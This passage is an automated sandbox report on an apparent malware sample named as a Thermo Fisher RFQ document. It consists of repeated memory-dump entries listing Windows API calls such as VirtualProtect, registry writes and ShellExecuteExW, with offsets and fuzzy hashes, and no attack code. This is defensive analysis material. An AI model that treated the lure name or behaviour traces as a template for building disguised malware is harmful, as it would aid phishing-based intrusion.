                                              • Associated: 00000000.00000002.87353695868.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87354320706.00000000007D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_Thermo Fisher RFQ_TFS-1207.jbxd
                                              Similarity
                                              • API ID: CreateDirectoryErrorLast
                                              • String ID:
                                              • API String ID: 1375471231-0
                                              • Opcode ID: 7ce514c051633c67dabed91c1ba2c830ad6f4192d7236d4c27a26ed09d9cb01d
                                              • Instruction ID: 7bb2d1eb449126eed485e4eb4fbdbafbf981390ed288ef949080c13de55397a1
                                              • Opcode Fuzzy Hash: 7ce514c051633c67dabed91c1ba2c830ad6f4192d7236d4c27a26ed09d9cb01d
                                              • Instruction Fuzzy Hash: 7CC08C30314902DADA802B209F0870B3A60AB80340F154439A582E00E4CA30A445C92D
                                              APIs
                                              • CreateFileA.KERNELBASE(00000000), ref: 6FE72C57
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.87376840731.000000006FE71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FE70000, based on PE: true
                                              • Associated: 00000000.00000002.87376762635.000000006FE70000.00000002.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000000.00000002.87376915461.000000006FE74000.00000002.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000000.00000002.87376990254.000000006FE76000.00000002.00000001.01000000.00000009.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6fe70000_Thermo Fisher RFQ_TFS-1207.jbxd
                                              Similarity
                                              • API ID: CreateFile
                                              • String ID:
                                              • API String ID: 823142352-0
                                              • Opcode ID: b50cd1474a003202013d072df706720d04fa5d76d5618025fa6112ab15e455f5
                                              • Instruction ID: ac8bab2c51b7fe06c381408940bb8652c9dc88e4dd3bcbbadb2c32a4a62ed965
                                              • Opcode Fuzzy Hash: b50cd1474a003202013d072df706720d04fa5d76d5618025fa6112ab15e455f5
                                              • Instruction Fuzzy Hash: 01417E71904714DBDB30DF68D985B593FB5EB66328F30882AE5048A240DB38B891EFA1
                                              APIs
                                              • SetFilePointer.KERNELBASE(00000000,?,00000000,?,?), ref: 004028D4
                                                • Part of subcall function 0040649B: wsprintfW.USER32 ref: 004064A8
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.87353660468.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.87353631384.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353695868.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87354320706.00000000007D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_Thermo Fisher RFQ_TFS-1207.jbxd
                                              Similarity
                                              • API ID: FilePointerwsprintf
                                              • String ID:
                                              • API String ID: 327478801-0
                                              • Opcode ID: 874a48f5052de35ce3f5d68bebafa1d1d6b4bc0d038a260f4494356ae22f2f83
                                              • Instruction ID: d8afcb7e31c577c7df5a47bf7b189458025ebbcb83da75e60b69e678f76aa364
                                              • Opcode Fuzzy Hash: 874a48f5052de35ce3f5d68bebafa1d1d6b4bc0d038a260f4494356ae22f2f83
                                              • Instruction Fuzzy Hash: E8E06D71904104AADB00EFA5AE498AE77B9EB80349B20443FF101B00E9C67859109A3D
                                              APIs
                                              • WritePrivateProfileStringW.KERNEL32(00000000,00000000,?,00000000), ref: 0040240E
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.87353660468.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.87353631384.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353695868.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87354320706.00000000007D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_Thermo Fisher RFQ_TFS-1207.jbxd
                                              Similarity
                                              • API ID: PrivateProfileStringWrite
                                              • String ID:
                                              • API String ID: 390214022-0
                                              • Opcode ID: 05d014058449bd4b547e5342c092477e81e00b6c136499da1acfa5e54e0b5503
                                              • Instruction ID: ca2f62041d63e4abf833ada0eb3473e8090594299762c22e2e4a91b8788c92d6
                                              • Opcode Fuzzy Hash: 05d014058449bd4b547e5342c092477e81e00b6c136499da1acfa5e54e0b5503
                                              • Instruction Fuzzy Hash: CEE086319105266BDB103AF20ECE9BE2058AF48308B24093FF512B61C2DEFC8C42567D
                                              APIs
                                              • SearchPathW.KERNELBASE(?,00000000,?,00000400,?,?,000000FF), ref: 0040176E
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.87353660468.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.87353631384.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353695868.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87354320706.00000000007D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_Thermo Fisher RFQ_TFS-1207.jbxd
                                              Similarity
                                              • API ID: PathSearch
                                              • String ID:
                                              • API String ID: 2203818243-0
                                              • Opcode ID: 90ae4191cc2eee50ed17e5dc204d1be3e337bf975627a90f163dd72e6c21e694
                                              • Instruction ID: 5ef6c9dc075d7657941f8fe9075485116ee4ddb5350d9d3ef67c2e6f18a0d880
                                              • Opcode Fuzzy Hash: 90ae4191cc2eee50ed17e5dc204d1be3e337bf975627a90f163dd72e6c21e694
                                              • Instruction Fuzzy Hash: 6FE04871204101AAE700DB94DD49EAF7768DF50358F20813BE511A60D1E6B49914972D
                                              APIs
                                              • RegCreateKeyExW.KERNELBASE(00000000,?,00000000,00000000,00000000,?,00000000,?,00000000,?,?,?,00402E7C,00000000,?,?), ref: 00406418
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.87353660468.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.87353631384.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353695868.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87354320706.00000000007D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_Thermo Fisher RFQ_TFS-1207.jbxd
                                              Similarity
                                              • API ID: Create
                                              • String ID:
                                              • API String ID: 2289755597-0
                                              • Opcode ID: b17b4e85cc10dff7c00d1995fa2300a068af545831f113dbcef6cd8b4d780b07
                                              • Instruction ID: 1ec48b264e911f442ad562827ea2aeba8bdc9c692846981259ff7ce92a87d17c
                                              • Opcode Fuzzy Hash: b17b4e85cc10dff7c00d1995fa2300a068af545831f113dbcef6cd8b4d780b07
                                              • Instruction Fuzzy Hash: 60E0BF72110109BFEF095F90DD0AD7B761DE704210B01452EF906D4051E6B5A9305674
                                              APIs
                                              • ReadFile.KERNELBASE(00000000,00000000,?,?,00000000,000000FF,?,004034E4,00000000,00000000,0040332B,000000FF,?,00000000,00000000,00000000), ref: 004060DB
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.87353660468.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.87353631384.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353695868.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87354320706.00000000007D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_Thermo Fisher RFQ_TFS-1207.jbxd
                                              Similarity
                                              • API ID: FileRead
                                              • String ID:
                                              • API String ID: 2738559852-0
                                              • Opcode ID: 076a4193e787d8b2f8fcded04b516b0b1a94860d7d4352c54bed072072f3bbd3
                                              • Instruction ID: 1a6ac9c2f17c3bf7024e7b579d6ce6ab3b84958f313ea5b4b1ce89539a84cc3a
                                              • Opcode Fuzzy Hash: 076a4193e787d8b2f8fcded04b516b0b1a94860d7d4352c54bed072072f3bbd3
                                              • Instruction Fuzzy Hash: 55E0EC3225026AABDF10DE55DC00EEB7BACEB053A0F018437F956E7150DA31E93197A8
                                              APIs
                                              • WriteFile.KERNELBASE(00000000,00000000,?,?,00000000,000000FF,?,0040349A,00000000,00793700,000000FF,00793700,000000FF,000000FF,?,00000000), ref: 0040610A
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.87353660468.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.87353631384.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353695868.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87354320706.00000000007D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_Thermo Fisher RFQ_TFS-1207.jbxd
                                              Similarity
                                              • API ID: FileWrite
                                              • String ID:
                                              • API String ID: 3934441357-0
                                              • Opcode ID: 4494c28c6fc58b77f7b94402ffbb10e79d92760fb9961e7d9dbcb201027e3d13
                                              • Instruction ID: 280cd4c212b49affc14266408846aa3a30e7e9a640caac8a44b81d30c287abca
                                              • Opcode Fuzzy Hash: 4494c28c6fc58b77f7b94402ffbb10e79d92760fb9961e7d9dbcb201027e3d13
                                              • Instruction Fuzzy Hash: E1E08C3221025AABCF109E908C01EEB7B6CEB043A0F014433FD16EB051D230E8319BA8
                                              APIs
                                              • VirtualProtect.KERNELBASE(6FE7505C,?,?,6FE7504C), ref: 6FE72A9D
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.87376840731.000000006FE71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FE70000, based on PE: true
                                              • Associated: 00000000.00000002.87376762635.000000006FE70000.00000002.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000000.00000002.87376915461.000000006FE74000.00000002.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000000.00000002.87376990254.000000006FE76000.00000002.00000001.01000000.00000009.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6fe70000_Thermo Fisher RFQ_TFS-1207.jbxd
                                              Similarity
                                              • API ID: ProtectVirtual
                                              • String ID:
                                              • API String ID: 544645111-0
                                              • Opcode ID: 0ae080389d0589eee9b08c04dc3775ba0dc985683f3eab0bc5005dcf86d009f0
                                              • Instruction ID: e2031979262511a7493212226849cd5f616a3c75889a7e9bf3e9c7291dba9fb2
                                              • Opcode Fuzzy Hash: 0ae080389d0589eee9b08c04dc3775ba0dc985683f3eab0bc5005dcf86d009f0
                                              • Instruction Fuzzy Hash: 5CF0C2B0904BA0DEDB60CF3C8444B093FE2BB1B324B24452FE188D6244E7347465EFA1
                                              APIs
                                              • GetPrivateProfileStringW.KERNEL32(00000000,?,?,?,000003FF,00000000), ref: 0040244A
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.87353660468.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.87353631384.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353695868.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87354320706.00000000007D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_Thermo Fisher RFQ_TFS-1207.jbxd
                                              Similarity
                                              • API ID: PrivateProfileString
                                              • String ID:
                                              • API String ID: 1096422788-0
                                              • Opcode ID: af8866ea374093282caf300f4873787412238c1fbfbe0191187a71e12ad24201
                                              • Instruction ID: 53345aa50f94a5dbc05c73a67e8aa0b188b477950ab0ef6c1fe412bbc790425e
                                              • Opcode Fuzzy Hash: af8866ea374093282caf300f4873787412238c1fbfbe0191187a71e12ad24201
                                              • Instruction Fuzzy Hash: E7E04F3180021AAADB00AFA0CE0ADAD3678AF00304F10493EF510BB0D1E7F889509759
                                              APIs
                                              • RegOpenKeyExW.KERNELBASE(00000000,?,00000000,00000000,?,?,00000000,?,0040644F,?,?,?,?,Call,?,00000000), ref: 004063E5
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.87353660468.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.87353631384.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353695868.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87354320706.00000000007D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_Thermo Fisher RFQ_TFS-1207.jbxd
                                              Similarity
                                              • API ID: Open
                                              • String ID:
                                              • API String ID: 71445658-0
                                              • Opcode ID: 8ee5b0d2344bda13eae74e7442d869633e0228d129a7f9cdea9876c3f2a2c01f
                                              • Instruction ID: e359b3f9d4e5954a9af9fcfc08987e0780d6658b6568ce36bf776d9a1ed3ba47
                                              • Opcode Fuzzy Hash: 8ee5b0d2344bda13eae74e7442d869633e0228d129a7f9cdea9876c3f2a2c01f
                                              • Instruction Fuzzy Hash: 5AD0123210020DBBDF115F90AD01FAB771DAB08310F014826FE17E40D0D775D530A7A4
                                              APIs
                                              • SetFileAttributesW.KERNELBASE(00000000,?,?), ref: 004015D3
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.87353660468.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.87353631384.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353695868.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87354320706.00000000007D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_Thermo Fisher RFQ_TFS-1207.jbxd
                                              Similarity
                                              • API ID: AttributesFile
                                              • String ID:
                                              • API String ID: 3188754299-0
                                              • Opcode ID: 9d343ac4382d2e8cff30bc3796d860aaf3667ae62c4bad401f9ffbe6388ce1d7
                                              • Instruction ID: 2b9d1094eaa3a8f74ec8242088029bd2eb80cc7fbaada08ad61a8f4613916ca8
                                              • Opcode Fuzzy Hash: 9d343ac4382d2e8cff30bc3796d860aaf3667ae62c4bad401f9ffbe6388ce1d7
                                              • Instruction Fuzzy Hash: 8BD05B72B08101D7DB00DBE89B48A9E77609B50368B30C53BD111F11E4D6B8C555A71D
                                              APIs
                                              • SendMessageW.USER32(?,00000000,00000000,00000000), ref: 00404531
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.87353660468.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.87353631384.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353695868.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87354320706.00000000007D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_Thermo Fisher RFQ_TFS-1207.jbxd
                                              Similarity
                                              • API ID: MessageSend
                                              • String ID:
                                              • API String ID: 3850602802-0
                                              • Opcode ID: f1c7da54befd6d6a563f00396e813b8d921f3a4fa707ebac73e9c93964ba1fa7
                                              • Instruction ID: 80e323bcaa4fb1d2d6ad7f8777a1edc32b6b0207238f0482179e9273dd0660e4
                                              • Opcode Fuzzy Hash: f1c7da54befd6d6a563f00396e813b8d921f3a4fa707ebac73e9c93964ba1fa7
                                              • Instruction Fuzzy Hash: 10C09BB57443007BDA149B509E45F17776467D4741F14C5797340F50F0C774E450D62C
                                              APIs
                                              • ShellExecuteExW.SHELL32(?), ref: 00405B89
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.87353660468.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.87353631384.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353695868.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87354320706.00000000007D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_Thermo Fisher RFQ_TFS-1207.jbxd
                                              Similarity
                                              • API ID: ExecuteShell
                                              • String ID:
                                              • API String ID: 587946157-0
                                              • Opcode ID: accb29398adcd6f2598047f0fcddae8b07494e52d9cc9fcafc25c5f5f83f3143
                                              • Instruction ID: 080962bbef7e268e86b0d243ececfcd1ad47764945baea7f73af6130fa7b9bd6
                                              • Opcode Fuzzy Hash: accb29398adcd6f2598047f0fcddae8b07494e52d9cc9fcafc25c5f5f83f3143
                                              • Instruction Fuzzy Hash: A9C092F2100201EFE301CF80CB09F067BE8AF54306F028058E1899A060CB788800CB29
                                              APIs
                                              • SendMessageW.USER32(?,?,00000001,00404333), ref: 00404516
                                              Memory Dump Source
